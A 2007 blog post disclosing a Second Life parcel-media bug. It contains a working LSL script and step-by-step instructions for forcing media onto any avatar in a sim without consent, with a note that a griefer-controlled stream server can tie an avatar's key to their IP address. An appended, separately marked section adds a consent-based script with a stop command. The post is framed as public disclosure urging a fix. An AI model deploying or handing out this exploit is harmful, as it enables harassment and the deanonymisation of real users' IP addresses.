Wednesday, October 24, 2007

How to media grief someone - exploit with code example

Thanks to Stirling Allen for helping me test this one, to Dizzy Banjo for bringing this to the attention of people, and to the Music-Dev list for going over the technical details. I am publishing this because it is an exploitable bug, and people should know about it until the bug is fixed.

Right now parcel media commands take effect on a sim wide basis. A script can only change media if it is owned by (or deeded to) the parcel owner, but the change is not confined to that parcel. The LSL function that changes the settings can be directed at a particular avatar key, and it reaches that avatar regardless of where they are within the sim. No permission is asked of the target. Here is the exploit:


    default
    {
        state_entry()
        {
            // Listen on channel 55 (chosen arbitrarily) to anyone, for any message
            llListen(55, "", NULL_KEY, "");
        }

        listen(integer channel, string name, key id, string m)
        {
            // llParcelMediaQuery returns an empty list unless this object is owned
            // by (or deeded to) the parcel owner; without that right nothing below works
            if (llParcelMediaQuery([PARCEL_MEDIA_COMMAND_TEXTURE]) == [])
            {
                llSay(0, "Lacking permission to set/query parcel media. This object has to be owned by/deeded to the land owner.");
                return;
            }

            // m is the chat message: the key of the target avatar. PARCEL_MEDIA_COMMAND_AGENT
            // aims the command at that avatar wherever they are in the sim, with no permission prompt
            llParcelMediaCommandList([
                PARCEL_MEDIA_COMMAND_URL,     "http://www.americafree.tv/unicast_mov/AmericaFreeTVClassics.mov",
                PARCEL_MEDIA_COMMAND_AGENT,   (key) m,
                PARCEL_MEDIA_COMMAND_TEXTURE, (key) "7419658d-b07d-3353-ed87-67b801cb6ff9",
                PARCEL_MEDIA_COMMAND_PLAY ]);
        }
    }


You will need to replace "7419658d-b07d-3353-ed87-67b801cb6ff9" with the key of any texture you have access to, including public ones; it just happens to be the one I used here.

Now put this script in a group object (deeded so it counts as owned by the land owner) and set the next-owner permissions to full. Chat on channel 55 (chosen arbitrarily) the key id of the target avatar, who can be anywhere on the sim, even standing on a parcel with no media set.

The avatar's media will be forced to that setup and will start playing. If the media stream points at a server the griefer controls, they have just matched a key id to an IP address: the target's own viewer fetches the stream directly, and media connections exposing the viewer's IP is a known security problem.

This exploit has been tested in world, and works.

Oh, and you can't turn it back off from your own client if you don't have the ability to set media settings, unless you have a similar script of your own that you can run on land where it has media permissions.

This needs to be fixed.

[UPDATE]

Fixed does not mean removed. This same command feature can be used to let people listen to whatever media they want, and is used in several in world products. For the same reason that huge prims should stay, so should this.
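Since the command feature is worth keeping, here is what a consent-based use of it looks like. This is an added example, not code from the original post: the only avatar whose media changes is the one who asked for it, the target key is never taken from the chat message, and there is a "stop" command, which is the opt-out a victim of the exploit above lacks. Channel 55, the URL and the texture key are placeholders reused from the post; the check that the requester is standing over the owner's land assumes the owner holds just this parcel.

```lsl
// Added example, not code from the original post. A consent-based use of the
// same llParcelMediaCommandList feature: the only avatar whose media changes is
// the one who asked, and only while standing over land this object's owner holds.
// Channel 55, the URL and the texture key are placeholders reused from the post.

integer CHANNEL   = 55;
string  MEDIA_URL = "http://www.americafree.tv/unicast_mov/AmericaFreeTVClassics.mov";
key     MEDIA_TEX = (key)"7419658d-b07d-3353-ed87-67b801cb6ff9";

// TRUE when this object is owned by (or deeded to) the parcel owner.
// llParcelMediaQuery returns an empty list for objects without that right.
integer can_set_media()
{
    return llGetListLength(llParcelMediaQuery([PARCEL_MEDIA_COMMAND_TEXTURE])) > 0;
}

// TRUE when id is an avatar currently in this region and standing over land
// owned by this object's owner (assumption: the owner holds only this parcel).
integer requester_allowed(key id)
{
    if (llGetAgentSize(id) == ZERO_VECTOR) return FALSE; // not an avatar in the region
    return llOverMyLand(id);
}

default
{
    state_entry()
    {
        llListen(CHANNEL, "", NULL_KEY, "");
        if (!can_set_media())
            llOwnerSay("This object has to be owned by/deeded to the land owner.");
    }

    listen(integer channel, string name, key id, string msg)
    {
        // Unlike the exploit, the target is always the speaker (id), never a
        // key pulled out of the chat message, so nobody can aim this at others.
        if (!can_set_media() || !requester_allowed(id)) return;

        msg = llToLower(msg);
        if (msg == "play")
        {
            llParcelMediaCommandList([
                PARCEL_MEDIA_COMMAND_URL,     MEDIA_URL,
                PARCEL_MEDIA_COMMAND_AGENT,   id,
                PARCEL_MEDIA_COMMAND_TEXTURE, MEDIA_TEX,
                PARCEL_MEDIA_COMMAND_PLAY ]);
        }
        else if (msg == "stop")
        {
            // The opt-out the post says a victim lacks: the same agent-targeted
            // command, but STOP and UNLOAD instead of PLAY.
            llParcelMediaCommandList([
                PARCEL_MEDIA_COMMAND_AGENT, id,
                PARCEL_MEDIA_COMMAND_STOP,
                PARCEL_MEDIA_COMMAND_UNLOAD ]);
        }
    }
}
```

The avatar says "play" or "stop" on channel 55 and only their own media changes. The IP exposure described above is unchanged by this script, since the viewer still fetches the stream directly; what changes is that nobody is connected to a stream they did not ask for.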
